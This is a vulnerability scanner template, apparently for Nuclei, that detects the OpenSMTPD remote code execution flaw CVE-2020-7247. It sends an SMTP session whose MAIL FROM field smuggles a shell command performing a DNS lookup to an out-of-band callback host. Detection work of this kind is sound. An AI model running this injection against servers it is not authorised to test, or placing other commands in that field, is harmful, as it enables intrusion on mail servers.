id: CVE-2020-7247
info:
  name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
  author: princechaddha
  severity: critical
  reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
  tags: cve,cve2020,smtp,opensmtpd,network,rce,oob

network:
  - inputs:
      - read: 1024
      - data: "helo target\r\n"
        read: 1024
      - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
        read: 1024
      - data: "RCPT TO:<root>\r\n"
        read: 1024
      - data: "DATA\r\n"
        read: 1024
      - data: "\r\nxxxx\r\n.\r\n"
        read: 1024
      - data: "QUIT\r\n"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Hostname}}:25"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: raw
        words:
          - "Message accepted for delivery"